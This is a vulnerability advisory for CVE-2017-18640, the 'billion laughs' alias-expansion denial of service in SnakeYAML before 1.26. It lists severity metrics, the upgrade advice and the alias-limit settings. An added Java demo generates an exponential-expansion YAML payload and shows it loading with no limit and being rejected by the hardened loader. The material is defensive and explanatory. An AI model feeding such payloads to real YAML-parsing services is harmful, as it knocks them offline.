CVE-2017-18640
HIGH severity · CVSS 7.5 · CWE-776
Summary
The Alias feature in SnakeYAML before 1.26 allows unbounded alias expansion during a load operation: a document of a few hundred bytes whose anchors are aliased nine times per level stands for an exponentially larger object graph (a "billion laughs" document), so loading or walking it exhausts CPU and memory. The issue is related to CVE-2003-1564, the XML entity-expansion variant of the same attack.
Impact & exploitability
Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Confidentiality impact: None
Integrity impact: None
Availability impact: High
Exploit probability (EPSS): 27%
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Recommendation
Upgrade SnakeYAML to 1.26 or later, the first release in which the loader enforces a budget on alias expansion (LoaderOptions.setMaxAliasesForCollections, default 50 aliases to non-scalar nodes per document, together with setAllowRecursiveKeys, default false). Check the exact safe version of any product that bundles SnakeYAML, since the library is commonly shaded into other artifacts. Until the upgrade is in place, do not load YAML from untrusted sources.
Official patch: https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion
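The following Java program is an added illustration for this page; it is not code from the SnakeYAML project or from the advisory. It shows the mechanism described in the Summary and the LoaderOptions settings behind the Recommendation: it builds a constructed billion-laughs document (nine aliases per level), loads it once with the alias budget lifted to reproduce the pre-1.26 behaviour and once with the 1.26 defaults written out, and walks the resulting object graph the way any consumer would. The class name AliasExpansionDemo and the helper names are my own; the only assumption is that org.yaml:snakeyaml 1.26 or later is on the classpath.

```java
// Added example, not SnakeYAML project code: a constructed "billion laughs" YAML document
// loaded with and without the alias budget SnakeYAML 1.26 introduced. Requires
// org.yaml:snakeyaml 1.26 or later on the classpath (the pre-1.26 behaviour is
// reproduced by lifting the limit rather than by installing an old release).
import java.util.List;
import java.util.Map;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.error.YAMLException;

public class AliasExpansionDemo {

    /** Constructed payload: level 0 is a nine-element sequence; every later level is a
     *  sequence of nine aliases to the previous level, so level n stands for 9^(n+1)
     *  scalars while the text grows by roughly 40 bytes per level. */
    static String billionLaughs(int levels) {
        StringBuilder sb = new StringBuilder("l0: &l0 [lol, lol, lol, lol, lol, lol, lol, lol, lol]\n");
        for (int i = 1; i <= levels; i++) {
            sb.append('l').append(i).append(": &l").append(i).append(" [");
            for (int j = 0; j < 9; j++) {
                sb.append("*l").append(i - 1).append(j < 8 ? ", " : "");
            }
            sb.append("]\n");
        }
        return sb.toString();
    }

    /** Loader with the 1.26 defaults written out: at most 50 aliases to non-scalar
     *  nodes per document, and no recursive (self-referencing) mapping keys. */
    static Yaml hardenedLoader() {
        LoaderOptions opts = new LoaderOptions();
        opts.setMaxAliasesForCollections(50);
        opts.setAllowRecursiveKeys(false);
        return new Yaml(opts);
    }

    /** Loader behaving like SnakeYAML before 1.26: no alias budget at all. */
    static Yaml unlimitedLoader() {
        LoaderOptions opts = new LoaderOptions();
        opts.setMaxAliasesForCollections(Integer.MAX_VALUE);
        return new Yaml(opts);
    }

    /** Walks the loaded object graph the way any consumer (serialiser, toString,
     *  hashCode on nested collections) would: a node shared through aliases is
     *  visited once per reference, so the cost is exponential in the level count. */
    static long countScalars(Object node) {
        long n = 0;
        if (node instanceof Map) {
            for (Object v : ((Map<?, ?>) node).values()) n += countScalars(v);
            return n;
        }
        if (node instanceof List) {
            for (Object v : (List<?>) node) n += countScalars(v);
            return n;
        }
        return 1;
    }

    public static void main(String[] args) {
        // Six levels = 54 aliases to sequences: just over the 1.26 default budget of 50.
        String payload = billionLaughs(6);
        System.out.println("payload size: " + payload.length() + " bytes");

        Object graph = unlimitedLoader().load(payload);
        long t0 = System.nanoTime();
        long scalars = countScalars(graph);
        System.out.printf("unlimited loader: graph represents %,d scalars, walked in %d ms%n",
                scalars, (System.nanoTime() - t0) / 1_000_000);

        try {
            hardenedLoader().load(payload);
            System.out.println("hardened loader: accepted (unexpected for this payload)");
        } catch (YAMLException e) {
            // 1.26+ rejects the document during composition, before any Java objects are built.
            System.out.println("hardened loader: rejected: " + e.getMessage());
        }

        // A legitimate document with a handful of aliases is unaffected by the limit.
        String benign = "defaults: &d {retries: 3, timeout: 30}\n"
                + "svc-a: *d\nsvc-b: *d\n";
        Map<?, ?> cfg = hardenedLoader().load(benign);
        System.out.println("hardened loader: benign document keys = " + cfg.keySet());
    }
}
```

Six levels keep the unrestricted walk to a few million visits so the program finishes quickly; every additional level multiplies that walk by nine while adding about 40 bytes to the document, which is the asymmetry the advisory describes. The hardened loader fails closed on the 51st alias to a collection, so the alias budget should be left at the default unless a trusted document genuinely needs more, in which case raise it deliberately rather than disabling it.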
Additional information
- NVD record
- Patch: https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion
- Advisory: https://bitbucket.org/asomov/snakeyaml/wiki/Billion%20laughs%20attack
- Advisory: https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes
- https://lists.apache.org/thread.html/r1058e7646988394de6a3fd0857ea9b1ee0de14d7bb28fee5ff782457%40%3Ccommits.atlas.apache.org%3E
- https://lists.apache.org/thread.html/r154090b871cf96d985b90864442d84eb027c72c94bc3f0a5727ba2d1%40%3Ccommon-issues.hadoop.apache.org%3E
- https://lists.apache.org/thread.html/r16ae4e529401b75a1f5aa462b272b31bf2a108236f882f06fddc14bc%40%3Ccommon-issues.hadoop.apache.org%3E
- https://lists.apache.org/thread.html/r1703a402f30c8a2ee409f8c6f393e95a63f8c952cc9ee5bf9dd586dc%40%3Ccommits.cassandra.apache.org%3E
- Advisory: https://bitbucket.org/snakeyaml/snakeyaml/issues/377